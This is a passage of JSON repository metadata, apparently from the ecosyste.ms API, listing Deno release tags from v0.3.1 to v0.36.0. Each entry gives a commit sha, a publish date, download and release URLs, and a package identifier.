repositories/denoland%2Fdeno/tags/v0.36.0/manifests"},{"name":"std/0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0/manifests"},{"name":"v0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0/manifests"},{"name":"std/0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0/manifests"},{"name":"v0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0/manifests"},{"name":"std/0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0/manifests"},{"name":"v0.33.0","sha":"87c329c45ac0e3382c115793094317df15cbe5bf","kind":"commit","published_at":"2020-02-13T22:45:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0/manifests"},{"name":"v0.32.0","sha":"f4cc08c4fc97f86d82b860ac11a134dad75dfdca","kind":"commit","published_at":"2020-02-03T15:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0/manifests"},{"name":"v0.31.0","sha":"8bc639a23e141d350e35ea112a4a9be2ea536fe6","kind":"commit","published_at":"2020-01-24T16:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0/manifests"},{"name":"v0.30.1","sha":"7fd50065a7d8a4c6ed1b1090703a7baaabdbd6aa","kind":"commit","published_at":"2020-01-21T17:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1/manifests"},{"name":"v0.30.0","sha":"b2f01dcb50c68da2cab28b6bd64f4033e4ccf10e","kind":"commit","published_at":"2020-01-18T12:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0/manifests"},{"name":"v0.29.0","sha":"525784e5642cbd869c682a0fda595f55c785d607","kind":"commit","published_at":"2020-01-09T18:42:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0/manifests"},{"name":"v0.28.1","sha":"a61966a243cd5d09031fabd9a572a75aab8d2da8","kind":"commit","published_at":"2020-01-03T14:04:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1/manifests"},{"name":"v0.28.0","sha":"328fef9cd6aa0ab3033380cabdf91b9779db5054","kind":"commit","published_at":"2020-01-02T13:41:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0/manifests"},{"name":"v0.27.0","sha":"fcae4a7c0dc74701f3b1919bfd76cfdc1a0321ed","kind":"commit","published_at":"2019-12-18T23:48:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0/manifests"},{"name":"v0.26.0","sha":"0ce9011edc8ec53df47e3103ecca3069d385ce37","kind":"commit","published_at":"2019-12-06T02:41:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0/manifests"},{"name":"v0.25.0","sha":"2cd22b5437a375f0e33f26327101afb818a03802","kind":"commit","published_at":"2019-11-26T18:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0/manifests"},{"name":"v0.24.0","sha":"0fffef8e5afed754358efc5b41d93549592cd941","kind":"commit","published_at":"2019-11-15T03:52:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0/manifests"},{"name":"v0.23.0","sha":"a611788834e40153ef27c8f1d6b7fd52c8a016b1","kind":"tag","published_at":"2019-11-05T02:50:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0/manifests"},{"name":"v0.22.0","sha":"71efe6f2c530d1cb9e8a2679f5778e2c034a9d0d","kind":"commit","published_at":"2019-10-28T18:12:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0/manifests"},{"name":"v0.21.0","sha":"4e88ba9a114279b3969d5ccca1cca0f74c8fc1fd","kind":"commit","published_at":"2019-10-19T22:46:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0/manifests"},{"name":"v0.20.0","sha":"a4b27db21a10f9913460c054c98fce59f3dd157d","kind":"commit","published_at":"2019-10-07T16:57:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0/manifests"},{"name":"v0.19.0","sha":"3892cf59018acd71dd4bc1099d747bd683cd4118","kind":"commit","published_at":"2019-09-25T14:58:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0/manifests"},{"name":"v0.18.0","sha":"7e3296dad92cee2e8b77baedfbeca38aa297928e","kind":"commit","published_at":"2019-09-13T20:40:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0/manifests"},{"name":"v0.17.0","sha":"82588ec09c199683cff88097e1b90649497239c7","kind":"commit","published_at":"2019-09-04T21:15:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0/manifests"},{"name":"v0.16.0","sha":"0809b06a3938868f364f1343b0de4d5d9686495d","kind":"tag","published_at":"2019-08-22T22:12:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0/manifests"},{"name":"v0.15.0","sha":"58f0e9b9b1b53ca486ef38ae662b98cbde839248","kind":"commit","published_at":"2019-08-13T22:35:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0/manifests"},{"name":"v0.14.0","sha":"83d5362f1d7d8589b862de57912135067a8278c7","kind":"tag","published_at":"2019-08-09T01:48:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0/manifests"},{"name":"v0.13.0","sha":"b3541c38f5672ffb4a29d66dca19d88b9ecae478","kind":"commit","published_at":"2019-07-31T19:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0/manifests"},{"name":"v0.12.0","sha":"4e248ecda9bb31478c6db7f5e76fa12b64b516a9","kind":"tag","published_at":"2019-07-16T20:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0/manifests"},{"name":"v0.11.0","sha":"92ac616708cb067a1b895283913c5ecd25c6d873","kind":"tag","published_at":"2019-07-07T16:19:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0/manifests"},{"name":"v0.10.0","sha":"c56df45355c8e68eabbfa62021e7ca7484115c0b","kind":"tag","published_at":"2019-06-25T14:11:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0/manifests"},{"name":"v0.9.0","sha":"7b06aa37342c021f9f1fac99125847d134e67001","kind":"commit","published_at":"2019-06-15T16:04:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0/manifests"},{"name":"v0.8.0","sha":"d60bdb6350f2583e35d020f6cebb6aa30262fbcc","kind":"commit","published_at":"2019-06-08T19:16:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0/manifests"},{"name":"v0.7.0","sha":"5265bd7cb1f86af99b01d73c537d52a50df95fe2","kind":"commit","published_at":"2019-05-29T22:42:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0/manifests"},{"name":"v0.6.0","sha":"22feb74ba12215597416b5531f8a557302283e79","kind":"commit","published_at":"2019-05-20T19:22:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0/manifests"},{"name":"v0.5.0","sha":"23aca36d52220efbfbc07abbe165bd2c9ade2009","kind":"commit","published_at":"2019-05-11T21:19:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0/manifests"},{"name":"v0.4.0","sha":"2aae09c2b869bf5d0bc5fd269464e8ac504528ea","kind":"commit","published_at":"2019-05-03T23:33:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0/manifests"},{"name":"v0.3.11","sha":"3b1e2f1ad42cfebb6f2568e54c82c5ac3c8fe3d4","kind":"commit","published_at":"2019-05-03T22:05:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11/manifests"},{"name":"v0.3.10","sha":"40d8ef1ec9f5e50017c41af8bf3b9f8454f97544","kind":"tag","published_at":"2019-04-25T20:00:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10/manifests"},{"name":"v0.3.9","sha":"e725b26b289fbe96b679039ba4203f10f7229ab9","kind":"tag","published_at":"2019-04-25T15:46:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9/manifests"},{"name":"v0.3.8","sha":"0796a8f2f75005df95ef6115a4bdf6dd66e58dc3","kind":"commit","published_at":"2019-04-19T15:41:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8/manifests"},{"name":"v0.3.7","sha":"8584d80cfd26111825af5a69fc6ae4c367ad0700","kind":"commit","published_at":"2019-04-11T19:35:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7/manifests"},{"name":"v0.3.6","sha":"744e56cb58f90acde7baf8811676021fb55b2f2a","kind":"tag","published_at":"2019-04-04T14:04:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6/manifests"},{"name":"v0.3.5","sha":"b965c7ab367a417fb7bdde2eaf38312179e5c183","kind":"commit","published_at":"2019-03-28T20:58:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5/manifests"},{"name":"v0.3.4","sha":"223a2adbb46cb33e75ffe861ecaff6ff7e6d555e","kind":"commit","published_at":"2019-03-20T22:54:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4/manifests"},{"name":"v0.3.3","sha":"3dbb06e699398549e8cfabc896ef3256ab433cba","kind":"tag","published_at":"2019-03-13T18:16:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3/manifests"},{"name":"v0.3.2","sha":"535037b519711d238dc0bfa2c4d2ffb4b17dec53","kind":"commit","published_at":"2019-03-07T02:22:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2/manifests"},{"name":"v0.3.1","sha":"b0c7b54f692ecc866d4f70bfa384631523bbf924","kind":"commit","published_at":"2019-02-27T21:20:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fde